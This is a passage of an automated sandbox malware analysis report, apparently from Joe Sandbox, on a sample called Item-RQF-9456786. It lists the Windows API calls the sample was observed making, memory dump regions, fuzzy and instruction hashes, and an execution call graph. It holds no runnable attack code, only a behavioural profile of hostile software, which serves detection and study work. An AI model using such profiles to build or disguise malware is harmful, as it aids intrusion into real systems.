                                                                                    control_flow_graph 901 76d2738-76d278c 903 76d278e-76d2794 901->903 904 76d2797-76d27a6 901->904 903->904 905 76d27a8 904->905 906 76d27ab-76d27e4 DrawTextExW 904->906 905->906 907 76d27ed-76d280a 906->907 908 76d27e6-76d27ec 906->908 908->907
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 076D27D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2291579180.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    • Opcode ID: 488a2584f91695712374ec42c920bb4f4bb9778dd36464842eb5f9e301fdaead
                                                                                    • Instruction ID: a5c6fc2300e3f8712a927392e3e9e827a97d6d75e42f6d95a1da3214f0bd670f
                                                                                    • Opcode Fuzzy Hash: 488a2584f91695712374ec42c920bb4f4bb9778dd36464842eb5f9e301fdaead
                                                                                    • Instruction Fuzzy Hash: 7031B2B5D1030A9FDB10CF9AD884ADEFBF9FB48320F14842AE519A7250D375A954CFA1

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 911 76d2740-76d278c 912 76d278e-76d2794 911->912 913 76d2797-76d27a6 911->913 912->913 914 76d27a8 913->914 915 76d27ab-76d27e4 DrawTextExW 913->915 914->915 916 76d27ed-76d280a 915->916 917 76d27e6-76d27ec 915->917 917->916
                                                                                    APIs
                                                                                    • DrawTextExW.USER32(?,?,?,?,?,?), ref: 076D27D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2291579180.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: DrawText
                                                                                    • String ID:
                                                                                    • API String ID: 2175133113-0
                                                                                    • Opcode ID: 8752025ac32bcae694ffb7fee207c52725b810df5cf043e4f8580b0633ad071d
                                                                                    • Instruction ID: 69eb317ec0d805066c8da3823f5d405827f6f17d2e39b30a875335dec1f4282f
                                                                                    • Opcode Fuzzy Hash: 8752025ac32bcae694ffb7fee207c52725b810df5cf043e4f8580b0633ad071d
                                                                                    • Instruction Fuzzy Hash: 0421A0B5D1024A9FDB10CF9AD884A9EBBF5BB48320F14842AE919A7310D775A944CFA1
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B0D76E,?,?,?,?,?), ref: 00B0D82F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 0a5915e740b3be5f6848f25eb61b680ff02dde5edd69d87e9b1d8a0a050e8463
                                                                                    • Instruction ID: 4309da5f59b1eac66afb90d9f0cb12ff012f60bba98c61680892ea817d9b160b
                                                                                    • Opcode Fuzzy Hash: 0a5915e740b3be5f6848f25eb61b680ff02dde5edd69d87e9b1d8a0a050e8463
                                                                                    • Instruction Fuzzy Hash: 0821D2B5D003499FDB10CF9AD884AEEBFF8EB48310F14845AE918A3350D374A954CFA1
                                                                                    APIs
                                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B0D76E,?,?,?,?,?), ref: 00B0D82F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: DuplicateHandle
                                                                                    • String ID:
                                                                                    • API String ID: 3793708945-0
                                                                                    • Opcode ID: 7c44a8fc8e949db624288dce36377e59c04bf4834c885a43805f8632ff7ec946
                                                                                    • Instruction ID: ecc3a8f75f1662da1e3a0a57c66252f64ec7619a7f122825a377ef19055db127
                                                                                    • Opcode Fuzzy Hash: 7c44a8fc8e949db624288dce36377e59c04bf4834c885a43805f8632ff7ec946
                                                                                    • Instruction Fuzzy Hash: E821DDB5D00349DFDB10CFA9D584AEEBBF5AB48320F14845AE918A3250D378A954CFA1
                                                                                    APIs
                                                                                    • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,076D3F0A,?,?,?,?,?), ref: 076D3FAF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2291579180.00000000076D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_76d0000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFromIconResource
                                                                                    • String ID:
                                                                                    • API String ID: 3668623891-0
                                                                                    • Opcode ID: d13036a4e9f08f3e416007703e94ef2185f918b76befe96acc11df550d866b87
                                                                                    • Instruction ID: 0a895ea7d7defe3a8564d2c5216732e07317b69f309efd475c28b2b7370742a0
                                                                                    • Opcode Fuzzy Hash: d13036a4e9f08f3e416007703e94ef2185f918b76befe96acc11df550d866b87
                                                                                    • Instruction Fuzzy Hash: 7A1144B1C10249DFDB10CFAAC844BDEBFF8EB48310F14841AE919A7210C335A954CFA5
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 00B0B11E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: HandleModule
                                                                                    • String ID:
                                                                                    • API String ID: 4139908857-0
                                                                                    • Opcode ID: 6a665d4766f57253d6f0ff1bbcd1330d2a81137795af4307b379f262e5efda77
                                                                                    • Instruction ID: 0d89f75f10e86b29b78c00e4c9d76e1358f46a6f83fc4f2264d090ef590e6220
                                                                                    • Opcode Fuzzy Hash: 6a665d4766f57253d6f0ff1bbcd1330d2a81137795af4307b379f262e5efda77
                                                                                    • Instruction Fuzzy Hash: A911E0B6C102498FCB10CF9AD848BDEFBF4EB88314F14845AD419B7250D375A545CFA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270556037.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_aad000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d41867d8a87d08f77c09dd3b072a31c7ba01465dbf92170d4187b6f4e07e291e
                                                                                    • Instruction ID: 77ca41aa8d38bd1a5849d61f4ebebc2138258dc5918d1812c4f3b5f759b084ba
                                                                                    • Opcode Fuzzy Hash: d41867d8a87d08f77c09dd3b072a31c7ba01465dbf92170d4187b6f4e07e291e
                                                                                    • Instruction Fuzzy Hash: EC2145B1500200EFDB00DF04D9C0B26BF65FB98324F24C569E84A0F696C33AE856CAA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270592329.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_abd000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fa25d8e9c6a9f631a680d233ee5932df76f9f8c2e847965e123df95c46c3bee7
                                                                                    • Instruction ID: 34d8e7dda78badd77731d8b55bf1bb6c333277229851d83d168b6dcd7dfafae1
                                                                                    • Opcode Fuzzy Hash: fa25d8e9c6a9f631a680d233ee5932df76f9f8c2e847965e123df95c46c3bee7
                                                                                    • Instruction Fuzzy Hash: 4C21D0B5604240EFDB14EF14D984B66BBA9FB88314F24C969D80A4B286D33AD807CA61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270592329.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_abd000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d946c4a3a9844497f6c765bf19d69c4b634d73a3dbdae2f73950625db1cdcfa0
                                                                                    • Instruction ID: 5023e716cae7ec3c44387f0fd34e057e8441cf4e2a4d473d99d5a1b4f5209b86
                                                                                    • Opcode Fuzzy Hash: d946c4a3a9844497f6c765bf19d69c4b634d73a3dbdae2f73950625db1cdcfa0
                                                                                    • Instruction Fuzzy Hash: 5B2104B1904280EFDB05DF14D9C0BA6BBA9FB84314F34CA6DE8094B293D336D806CB61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270556037.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_aad000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                                    • Instruction ID: 47d09ccbd2717aa11b07e6b43cc6ff778be6465f3689057c419720690eb88bb1
                                                                                    • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                                                    • Instruction Fuzzy Hash: CA112676404240CFDB02CF00D5C4B16BF71FB98324F24C2A9D84A0B656C33AE85ACBA1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270592329.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_abd000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                                    • Instruction ID: 7bfda643eb1128ac39adc936103cb8e433188b31c5fc12939ca09ee18b2f805c
                                                                                    • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                                    • Instruction Fuzzy Hash: 1911BB75904280DFCB02CF10D5C4B55BFA1FB84314F24C6A9D8494B696C33AD80ACB61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270592329.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_abd000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                                    • Instruction ID: 97d88631e8bf2f83ff7e3dbafa0b13e26143f7da6d8662a6f2293148ff9a261b
                                                                                    • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                                                    • Instruction Fuzzy Hash: BD11BB75504280CFCB11DF14D5C4B15BBA2FB84314F28C6AAD84A4B656C33AD81ACBA2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270556037.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_aad000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: fbfc87c957cfac70801676b35423bbb52b8155174ba0ab9ece32df4be28db3e9
                                                                                    • Instruction ID: 44282d0805c262b2e4e9c5e8b6a3f6c436a7e9fa9a604574ae9f65bbe9801fb6
                                                                                    • Opcode Fuzzy Hash: fbfc87c957cfac70801676b35423bbb52b8155174ba0ab9ece32df4be28db3e9
                                                                                    • Instruction Fuzzy Hash: A90126714083409AE7248F29CDC4B67FFA8DF42320F28C91AED4A0F6C6D7399841CAB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270556037.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_aad000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 434dbc8cfaca22f0aed9dd0126c2109a70b0c7696f4d331758f53d38fcd34941
                                                                                    • Instruction ID: ee13ceccdfd3ba15897aa87794bc8954a03292892366e2f405d7758d856a9333
                                                                                    • Opcode Fuzzy Hash: 434dbc8cfaca22f0aed9dd0126c2109a70b0c7696f4d331758f53d38fcd34941
                                                                                    • Instruction Fuzzy Hash: E0F0CD71404340AEE7248F1ACC88B62FFA8EF92334F18C45AED494F696C3799844CAB0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2270704129.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b00000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 76dfe247c64f9a45f81b0ae5b81379da2b8e491288f2c8b9a2bbdfacdef361f9
                                                                                    • Instruction ID: fc27f1a4c16175aa68c07460d665f52efdd5743ffb9f68811d4f75f3ca2cfb31
                                                                                    • Opcode Fuzzy Hash: 76dfe247c64f9a45f81b0ae5b81379da2b8e491288f2c8b9a2bbdfacdef361f9
                                                                                    • Instruction Fuzzy Hash: 66A12B32B006168FCF15DFA4C4545AEBBF2FF84300B1585BAE905AB2A5EB71E955CB80

                                                                                    Execution Graph

                                                                                    Execution Coverage:1.3%
                                                                                    Dynamic/Decrypted Code Coverage:4.5%
                                                                                    Signature Coverage:7.1%
                                                                                    Total number of Nodes:154
                                                                                    Total number of Limit Nodes:15
                                                                                    execution_graph 87714 425223 87719 42523c 87714->87719 87715 4252cf 87716 425287 87722 42ecb3 87716->87722 87719->87715 87719->87716 87720 4252ca 87719->87720 87721 42ecb3 RtlFreeHeap 87720->87721 87721->87715 87725 42cf43 87722->87725 87724 425297 87726 42cf60 87725->87726 87727 42cf71 RtlFreeHeap 87726->87727 87727->87724 87863 42fd53 87864 42fd63 87863->87864 87865 42fd69 87863->87865 87866 42ed93 RtlAllocateHeap 87865->87866 87867 42fd8f 87866->87867 87868 42c1d3 87869 42c1ed 87868->87869 87872 17e2df0 LdrInitializeThunk 87869->87872 87870 42c215 87872->87870 87873 424e93 87874 424eaf 87873->87874 87875 424ed7 87874->87875 87876 424eeb 87874->87876 87878 42cbd3 NtClose 87875->87878 87877 42cbd3 NtClose 87876->87877 87879 424ef4 87877->87879 87880 424ee0 87878->87880 87883 42edd3 RtlAllocateHeap 87879->87883 87882 424eff 87883->87882 87728 41b743 87729 41b787 87728->87729 87730 41b7a8 87729->87730 87732 42cbd3 87729->87732 87733 42cbed 87732->87733 87734 42cbfe NtClose 87733->87734 87734->87730 87735 41a9e3 87736 41a9fb 87735->87736 87738 41aa55 87735->87738 87736->87738 87739 41e943 87736->87739 87740 41e969 87739->87740 87746 41ea6f 87740->87746 87748 42fe83 87740->87748 87742 41ea04 87743 41ea66 87742->87743 87742->87746 87759 42c223 87742->87759 87743->87746 87754 428e53 87743->87754 87746->87738 87747 41eb27 87747->87738 87749 42fdf3 87748->87749 87750 42fe50 87749->87750 87763 42ed93 87749->87763 87750->87742 87752 42fe2d 87753 42ecb3 RtlFreeHeap 87752->87753 87753->87750 87755 428eb8 87754->87755 87756 428ef3 87755->87756 87769 418fd3 87755->87769 87756->87747 87758 428ed5 87758->87747 87760 42c240 87759->87760 87777 17e2c0a 87760->87777 87761 42c26c 87761->87743 87766 42cef3 87763->87766 87765 42edab 87765->87752 87767 42cf10 87766->87767 87768 42cf21 RtlAllocateHeap 87767->87768 87768->87765 87770 418f9c 87769->87770 87771 418ffd 87770->87771 87774 42cf93 87770->87774 87771->87758 87773 418fbb 87773->87758 87775 42cfad 87774->87775 87776 42cfbe ExitProcess 87775->87776 87776->87773 87778 17e2c1f LdrInitializeThunk 87777->87778 87779 17e2c11 87777->87779 87778->87761 87779->87761 87884 414493 87885 4144ad 87884->87885 87890 417c23 87885->87890 87887 4144cb 87888 414510 87887->87888 87889 4144ff PostThreadMessageW 87887->87889 87889->87888 87891 417c47 87890->87891 87892 417c83 LdrLoadDll 87891->87892 87893 417c4e 87891->87893 87892->87893 87893->87887 87894 4141b3 87895 4141d9 87894->87895 87896 414203 87895->87896 87898 4142cb 87895->87898 87899 413f33 LdrInitializeThunk 87895->87899 87899->87898 87780 413f86 87781 413f92 87780->87781 87782 413f47 87780->87782 87783 413f55 87782->87783 87785 42ce63 87782->87785 87786 42ce7d 87785->87786 87789 17e2c70 LdrInitializeThunk 87786->87789 87787 42cea5 87787->87783 87789->87787 87790 401ca8 87791 401cb8 87790->87791 87794 430223 87791->87794 87797 42e863 87794->87797 87798 42e889 87797->87798 87809 4076a3 87798->87809 87800 42e89f 87808 401d79 87800->87808 87812 41b553 87800->87812 87802 42e8be 87803 42e8d3 87802->87803 87805 42cf93 ExitProcess 87802->87805 87823 428763 87803->87823 87805->87803 87806 42e8ed 87807 42cf93 ExitProcess 87806->87807 87807->87808 87811 4076b0 87809->87811 87827 416903 87809->87827 87811->87800 87813 41b57f 87812->87813 87838 41b443 87813->87838 87816 41b5c4 87818 41b5e0 87816->87818 87821 42cbd3 NtClose 87816->87821 87817 41b5ac 87819 41b5b7 87817->87819 87820 42cbd3 NtClose 87817->87820 87818->87802 87819->87802 87820->87819 87822 41b5d6 87821->87822 87822->87802 87824 4287c5 87823->87824 87826 4287d2 87824->87826 87849 418a83 87824->87849 87826->87806 87828 41691d 87827->87828 87830 416933 87828->87830 87831 42d633 87828->87831 87830->87811 87833 42d64d 87831->87833 87832 42d67c 87832->87830 87833->87832 87834 42c223 LdrInitializeThunk 87833->87834 87835 42d6dc 87834->87835 87836 42ecb3 RtlFreeHeap 87835->87836 87837 42d6f5 87836->87837 87837->87830 87839 41b45d 87838->87839 87843 41b539 87838->87843 87844 42c2c3 87839->87844 87842 42cbd3 NtClose 87842->87843 87843->87816 87843->87817 87845 42c2dd 87844->87845 87848 17e35c0 LdrInitializeThunk 87845->87848 87846 41b52d 87846->87842 87848->87846 87851 418aad 87849->87851 87850 418fbb 87850->87826 87851->87850 87857 414113 87851->87857 87853 418bda 87853->87850 87854 42ecb3 RtlFreeHeap 87853->87854 87855 418bf2 87854->87855 87855->87850 87856 42cf93 ExitProcess 87855->87856 87856->87850 87858 414133 87857->87858 87859 41419c 87858->87859 87862 41b863 RtlFreeHeap LdrInitializeThunk 87858->87862 87859->87853 87861 414192 87861->87853 87862->87861 87900 4191d8 87901 42cbd3 NtClose 87900->87901 87902 4191e2 87901->87902 87903 17e2b60 LdrInitializeThunk

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 312 417c23-417c4c call 42f893 315 417c52-417c60 call 42fe93 312->315 316 417c4e-417c51 312->316 319 417c70-417c81 call 42e333 315->319 320 417c62-417c6d call 430133 315->320 325 417c83-417c97 LdrLoadDll 319->325 326 417c9a-417c9d 319->326 320->319 325->326
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417C95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2560619920.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: 328f7731dc45a0544d32d6300f712176fbe69daf62c9c17ae9a2f7434cffa9bc
                                                                                    • Instruction ID: d65416c8aa9de88eb01519d9064bc670331054a222807f9bdcbaeafa696c115c
                                                                                    • Opcode Fuzzy Hash: 328f7731dc45a0544d32d6300f712176fbe69daf62c9c17ae9a2f7434cffa9bc
                                                                                    • Instruction Fuzzy Hash: CB0121B5E0020DABDF10DBE5DC42FDEB3B89B54308F0081AAE91897241F635EB58CB95

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 337 42cbd3-42cc0c call 404a93 call 42de23 NtClose
                                                                                    APIs
                                                                                    • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CC07
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2560619920.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID:
                                                                                    • API String ID: 3535843008-0
                                                                                    • Opcode ID: 4e38c00dae261bef75bf053dafa103ddf5257f9c4bce10d2ce9fad77e1b094bc
                                                                                    • Instruction ID: 19b43f975e338ed482916bce527e3acbfbee5e1e724ed158b75023e58981e8ca
                                                                                    • Opcode Fuzzy Hash: 4e38c00dae261bef75bf053dafa103ddf5257f9c4bce10d2ce9fad77e1b094bc
                                                                                    • Instruction Fuzzy Hash: 0FE04F722002147BC610EA5AEC45F9BB76CDBCA714F10441AFA1867141C674B90187B4

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 351 17e2b60-17e2b6c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                                                    • Instruction ID: 3d4a8ec41e7c5125418a31caa15521e9e0c31aded5a697a1c1e22df6d38b6ba9
                                                                                    • Opcode Fuzzy Hash: a6349aaea2dee3298ecdb4214be2ea146f032dd24080b735fef10770f5b6d98e
                                                                                    • Instruction Fuzzy Hash: FB90026120640003460572584414617800AD7E1201B55C035E20145B0DC625CAA56226

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 353 17e2df0-17e2dfc LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                                                    • Instruction ID: 74b6f3b3a86666f00cb9df0ec6169908ad52cb82c7ebdb690ff3d7a16a4c64a5
                                                                                    • Opcode Fuzzy Hash: c251702a7e8b9881835ee4f742cd28888b7120ca8ad03a637a1f93a5fbd86917
                                                                                    • Instruction Fuzzy Hash: BF90023120540413D611725845047074009D7D1241F95C426A1424578DD756CB66A222

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 352 17e2c70-17e2c7c LdrInitializeThunk
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                                                    • Instruction ID: fc259d6c8cc1d04e0931c072ce0dc2f31e2177feab8edfe8dd191d80ce4db542
                                                                                    • Opcode Fuzzy Hash: 24fba69a6f457864d0088b9cc6bfa478ba7cfd189b10b3c6b498bcf452dad7dd
                                                                                    • Instruction Fuzzy Hash: 0690023120548802D6107258840474B4005D7D1301F59C425A5424678DC795CAA57222
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2565556975.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_1770000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    • Opcode ID: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                                                    • Instruction ID: bc5051d7db882bb6646cb09198d71de92c57379df9630b1fc0031d5be351dbe0
                                                                                    • Opcode Fuzzy Hash: 3611bf545818435cd5ae7afadf8eb13cd94a957b45ee17a2d5bd64f7f6ea82f8
                                                                                    • Instruction Fuzzy Hash: 9290023160950402D600725845147075005D7D1201F65C425A1424578DC795CB6566A3

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(645X-52,00000111,00000000,00000000), ref: 0041450A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2560619920.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 645X-52$645X-52
                                                                                    • API String ID: 1836367815-2091860764
                                                                                    • Opcode ID: c4f72bdc853723289a22db10a9d1cec04f1a080d9a07d699bdf0e9a2b8ab37cd
                                                                                    • Instruction ID: 54e1db586a8ed4d3b845a663ec751d497c5305db1d23ac70d665123d6daabb63
                                                                                    • Opcode Fuzzy Hash: c4f72bdc853723289a22db10a9d1cec04f1a080d9a07d699bdf0e9a2b8ab37cd
                                                                                    • Instruction Fuzzy Hash: C60104B2D0021C7ADB11AAE19C81DEFBB7CDF80798F40802AFA1467200E27C5E064BB1

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(645X-52,00000111,00000000,00000000), ref: 0041450A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.2560619920.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_Item-RQF-9456786.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID: 645X-52$645X-52
                                                                                    • API String ID: 1836367815-2091860764
                                                                                    • Opcode ID: bb53aac6d4ba36bb84e1edfe2d92872795f7251ccc18aa45e00cb7419d99bfc0
                                                                                    • Instruction ID: cece13d8343ac2b6c99a877cb3fd6383ec2a750366bba0476009461c131bd26b
                                                                                    • Opcode Fuzzy Hash: bb53aac6d4ba36bb84e1edfe2d92872795f7251ccc18aa45e00cb7419d99bfc0
                                                                                    • Instruction Fuzzy Hash: 8B01D671D0411976DB11BAA59C81DEFAB7CDE8175CF40805AFA1467200D63C4E464BB4

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 327 42cef3-42cf37 call 404a93 call 42de23 RtlAllocateHeap
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(?,0041EA04,?,?,00000000,?,0041EA04,?,?,?), ref: 0042CF32
                                                                                    Memory Dump Source
